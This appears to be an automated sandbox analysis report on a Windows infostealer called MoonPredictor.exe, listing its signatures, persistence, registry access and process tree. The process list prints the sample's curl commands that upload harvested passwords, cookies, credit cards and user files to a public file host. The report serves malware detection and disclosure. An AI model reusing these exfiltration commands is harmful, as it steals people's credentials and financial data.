Analysis Overview
SHA256
6fa636aaa6c81a0fc336a2e08dfbdd2d31c54da9a1dd44328f8c997c919644cc
Threat Level: Shows suspicious behavior
The file MoonPredictor.exe was found to be: Shows suspicious behavior.
Malicious Activity Summary
Reads user/profile data of web browsers
Loads dropped DLL
Drops startup file
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Detects Pyinstaller
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Modifies registry class
Suspicious use of WriteProcessMemory
Checks processor information in registry
Enumerates processes with tasklist
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-29 13:57
Signatures
Detects Pyinstaller
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-29 13:57
Reported
2024-05-29 13:58
Platform
win10-20240404-en
Max time kernel
18s
Max time network
20s
Command Line
Signatures
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MoonPredictor.exe | C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe
"C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe"
C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe
"C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.0.906147803\1893837670" -parentBuildID 20221007134813 -prefsHandle 1728 -prefMapHandle 1720 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a6f4a56e-7f05-494e-bf07-1cc008ff0584} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 1808 23262418e58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.1.457057340\966823217" -parentBuildID 20221007134813 -prefsHandle 2152 -prefMapHandle 2148 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {463e25bb-f02d-4077-b7a0-b4f87e8e6324} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 2164 232611f9558 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.2.419601715\1102580640" -childID 1 -isForBrowser -prefsHandle 2744 -prefMapHandle 2672 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5b71937f-63e3-4b1e-8e28-7f07aa756660} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 2980 232652f6058 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.3.1582382032\611746898" -childID 2 -isForBrowser -prefsHandle 3252 -prefMapHandle 3240 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e324d50-9887-402a-a8af-32ea75c06e19} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 3488 23263c46958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.4.2075582435\119602772" -childID 3 -isForBrowser -prefsHandle 4152 -prefMapHandle 4148 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0891d646-24ee-45ff-b2c8-721f08daf540} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 4164 23266a43058 tab
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store1.gofile.io/uploadFile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store1.gofile.io/uploadFile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store1.gofile.io/uploadFile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store1.gofile.io/uploadFile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store1.gofile.io/uploadFile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store1.gofile.io/uploadFile"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.5.1460825049\1895753631" -childID 4 -isForBrowser -prefsHandle 4772 -prefMapHandle 4764 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7310d7e7-b208-4d54-94c8-8fb007babae8} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 4800 232675fbc58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.6.1703885957\1381724603" -childID 5 -isForBrowser -prefsHandle 4932 -prefMapHandle 4936 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c2bcd844-d8cf-430a-b0da-a769fc9a7a7c} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 4924 232675fbf58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.7.1066197513\73023151" -childID 6 -isForBrowser -prefsHandle 4800 -prefMapHandle 4704 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f731f79-c6c7-47c6-ab1f-abecd794a564} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 5108 23268249858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.8.726074387\271029873" -childID 7 -isForBrowser -prefsHandle 5628 -prefMapHandle 4632 -prefsLen 26328 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0afa0caf-b2df-49c2-9cdc-5e0f9687892c} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 5680 23267283c58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.9.2104782825\18777930" -parentBuildID 20221007134813 -prefsHandle 5820 -prefMapHandle 5804 -prefsLen 26328 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b8583cf-5b53-40ee-8fd5-aae620ff6034} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 5688 232690bc258 rdd
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.10.477575502\1755831304" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 5992 -prefMapHandle 5988 -prefsLen 26328 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {07070499-f44f-4f3e-b13d-82563c2a72cf} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 6004 23269031558 utility
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/BackupReceive.ttc" https://store1.gofile.io/uploadFile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/BackupUnregister.clr" https://store1.gofile.io/uploadFile"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.11.671860188\408956740" -childID 8 -isForBrowser -prefsHandle 5368 -prefMapHandle 5288 -prefsLen 26503 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {52f650e6-a64d-4529-8ad2-f5d87f8af2c3} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 4732 23265263258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.12.1880285698\1255029390" -childID 9 -isForBrowser -prefsHandle 2856 -prefMapHandle 2852 -prefsLen 26503 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {00bf6b26-94a8-4cfb-89f1-5eeb35e66db1} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 4868 2326731a358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.13.824097604\555468084" -childID 10 -isForBrowser -prefsHandle 5156 -prefMapHandle 4732 -prefsLen 26503 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {027e6729-4eb2-45e9-9f92-842e92b00422} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 6548 2326759f558 tab
Network
Files
C:\Users\Admin\AppData\Local\Temp\_MEI14522\python312.dll
C:\Users\Admin\AppData\Local\Temp\_MEI14522\VCRUNTIME140.dll
C:\Users\Admin\AppData\Local\Temp\_MEI14522\base_library.zip
C:\Users\Admin\AppData\Local\Temp\_MEI14522\_ctypes.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI14522\python3.DLL
\Users\Admin\AppData\Local\Temp\_MEI14522\libffi-8.dll
C:\Users\Admin\AppData\Local\Temp\_MEI14522\_lzma.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI14522\VCRUNTIME140_1.dll
\Users\Admin\AppData\Local\Temp\_MEI14522\select.pyd
\Users\Admin\AppData\Local\Temp\_MEI14522\_hashlib.pyd
\Users\Admin\AppData\Local\Temp\_MEI14522\_queue.pyd
\Users\Admin\AppData\Local\Temp\_MEI14522\libssl-3.dll
\Users\Admin\AppData\Local\Temp\_MEI14522\_ssl.pyd
\Users\Admin\AppData\Local\Temp\_MEI14522\libcrypto-3.dll
\Users\Admin\AppData\Local\Temp\_MEI14522\_socket.pyd
\Users\Admin\AppData\Local\Temp\_MEI14522\_wmi.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI14522\_uuid.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI14522\_sqlite3.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI14522\_overlapped.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI14522\_multiprocessing.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI14522\_decimal.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI14522\_cffi_backend.cp312-win_amd64.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI14522\_asyncio.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI14522\unicodedata.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI14522\sqlite3.dll
C:\Users\Admin\AppData\Local\Temp\_MEI14522\pyexpat.pyd
\Users\Admin\AppData\Local\Temp\_MEI14522\_bz2.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI14522\charset_normalizer\md.cp312-win_amd64.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI14522\charset_normalizer\md__mypyc.cp312-win_amd64.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI14522\certifi\cacert.pem
C:\Users\Admin\AppData\Local\Temp\_MEI14522\Crypto\Cipher\_raw_ecb.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI14522\Crypto\Cipher\_raw_cbc.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI14522\Crypto\Cipher\_raw_cfb.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI14522\Crypto\Cipher\_raw_ofb.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI14522\Crypto\Cipher\_raw_ctr.pyd
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\db\data.safe.bin
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\pending_pings\f1d286bc-478f-4dc5-940a-66210aecca90
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\pending_pings\1b27f736-116f-41f2-adb2-647564d79b78
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs.js
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs-1.js
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore-backups\recovery.jsonlz4
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs.js
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\cache2\doomed\26113
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\storage\default\https+++www.youtube.com\cache\morgue\69\{880688a4-93df-43f1-9ccb-d770b767dc45}.final
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\storage\default\https+++www.youtube.com\idb\788007792yCt7-%iCt7-%r0e3sdpfo.sqlite